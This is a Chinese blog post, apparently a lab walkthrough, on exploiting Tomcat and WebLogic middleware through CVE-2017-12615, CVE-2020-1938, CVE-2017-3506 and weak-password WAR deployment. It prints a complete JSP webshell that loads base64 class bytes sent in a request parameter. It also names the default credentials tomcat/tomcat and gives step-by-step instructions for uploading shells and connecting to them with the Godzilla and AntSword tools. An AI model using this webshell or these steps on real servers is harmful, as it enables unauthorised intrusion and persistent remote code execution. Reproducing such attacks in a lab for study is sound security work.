首页 > 其他分享 >常见中间件漏洞

常见中间件漏洞

时间:2024-08-06 11:56:02浏览次数:10  
标签:哥斯拉 常见 中间件 漏洞 点击 jsp 木马 打开 页面

一、Tomcat

1.CVE-2017-12615

 1.1打开tomcat页面

1.2 打开burp进行抓包,修改PUT方式,后面加上一句话木马

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }

    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

1.3上传木马后进入这个jsp页面,burp放行

1.4打开中国蚁剑测试连接

2.后台弱口令部署war包

2.1打开tomcat页面点击左边的manager app,输入弱口令tomcat/tomcat

2.2进入manager页面

2.3打开哥斯拉生成一个jsp木马,我们压缩成zip文件再修改后缀为war

2.4我们选择这个war文件点击deploy

2.5我们再打开这个jsp文件

2.6最后打开哥斯拉进行连接测试

3.CVE-2020-1938

3.1 先搭建好环境

3.2打开kali下载cve2020-1938

3.3右键在此文件夹打开终端,并且输入 python2 Tomcat-ROOT路径下文件包含(CVE-2020-1938) -p8009 -f 木马文件夹名 ip

二、Weblogic

1.后台弱口令getshell

1.1进入环境在地址栏后输入/console进入登录页面

1.2输入弱口令登录

1.3进入页面后点击部署点击安装

1.4点击上载文件

1.5上传一个jsp木马,先压缩为zip再修改格式为war

1.6进入后访问你植入的木马,没有报错证明注入成功

1.7打开哥斯拉测试连接

2.CVE-2017-3506

2.1打开工具进行漏洞检测

2.2点击命令执行查看whoami

2.3点击文件上传,把jsp木马复制进去点击上传

2.4查看下方出现木马上传成功,打开他给出的地址

2.5没有回显证明木马上传成功

2.6打开哥斯拉测试连接成功

标签:哥斯拉,常见,中间件,漏洞,点击,jsp,木马,打开,页面
From: https://blog.csdn.net/weixin_53198216/article/details/140948740

相关文章

  • Java包装类;字符串处理类:String;StringBuffer;StringBuilder;字符串处理类的常用方法;异常
    一,包装类      什么是包装类:         包装类是对于八种基本数据类型而言的,八种数据类型都有其对应的包装类。         以前定义变量,经常使用基本数据类型,对于基本数据类型来说,它就是一个数,加点属性,加点方法,加点构造器。  ......
  • 转型AI产品经理需要掌握的硬知识(一):AI产品经理能力模型和常见AI概念梳理_产品经理学ai
    关于AI常见基础概念,你了解多少?近几年,从亚马逊,Facebook,到谷歌,微软,再到国内的BAT,全球最具影响力的技术公司都将目光转向了人工智能(AI)。2016年AlphaGo战胜李世石,把公众的目光也聚集到了人工智能。创新氛围最活跃的中国,已将人工智能定位国家战略,2017年11月15日,中国新一......
  • 漏洞复现:Apache solr
    目录漏洞简述环境搭建漏洞复现漏洞检测漏洞修复漏洞简述ApacheSolr是一个开源的搜索服务,使用Java编写、运行在Servlet容器的一个独立的全文搜索服务器,是ApacheLucene项目的开源企业搜索平台。该漏洞是由于没有对输入的内容进行校验,攻击者可利用该漏洞在未授权的情......
  • 后端MyBatis连接Mysql数据库时常见报错
     目录报错情况报错情况一:​编辑报错情况二:解决步骤一、解决命名问题1.mapper层的id是否和Dao层的方法名字相同2.检查namespace与Dao层的文件地址相同二、解决注解问题1.检查Controller层的注解是否正确和完整2.Dao层或者Mapper层的注解3.pojo层:实体类层Data注解(用......
  • 三十种未授权访问漏洞复现 合集( 五 )
     未授权访问漏洞介绍        未授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露。---->目录遍历        目前主要存在未授权访问漏洞的有:NFS服务,Sa......
  • 常见的PID的算法及代码示例
    常见的PID的算法及代码示例PID(比例-积分-微分)算法是控制系统中常用的一种反馈控制算法,它通过计算误差的比例、积分和微分来调整控制输入,以达到预定的控制目标。以下是一些常见的PID算法及代码示例:一、常见的PID算法位置式PID算法位置式PID算法直接计算控制量的绝对值,每次输......
  • SourceCodester v1.0 SQL 注入漏洞(CVE-2023-2130)靶场复现
    SourceCodesterPurchaseOrderManagementSystemv1.0是一个实用的工具,适合希望优化采购流程的企业和组织靶场界面直接放sqlmap跑爆数据库爆数据表爆字段爆内容-用户名爆内容-密码sqlmap的md5碰撞sqlmap所有命令点击查看代码爆数据库pythonsqlmap.py-u......
  • C/C++ 面试常见问题
    1.封装、继承和多态是什么?封装:将具体实现过程和数据封装成一个函数,只能通过接口访问,降低耦合性,使类成为一个具有内部数据自我隐藏能力且功能独立的软件模块。封装能够通过提供公共接口访问、不让类外的程序直接访问或修改来防止类中代码被破坏。继承:子类继承父类的行为和特征,复......
  • Jorani远程命令执行漏洞 CVE-2023-26469靶场复现
    靶场界面点击查看exp↓↓↓"""vulnerabilitycoveredbyCVE-2023-26469"""importreadlineimportrequestsimportdatetimeimportsysimportreimportbase64importrandomimportstringrequests.packages.urllib3.disable_warnings(requ......
  • 易捷OA协同办公软件 ShowPic 任意文件读取漏洞复现
    0x01产品简介易捷OA协同办公软件是在“让管理更简单”和“实时协同”的理念的指导下,”本着“简约、实时、快捷、省钱”的产品定位,结合数千家客户的管理实践和当前最先进的IT技术开发出来的全新一代协同产品,在云计算、全文检索、手机应用、企业即时通讯等多方面取得突破性创新......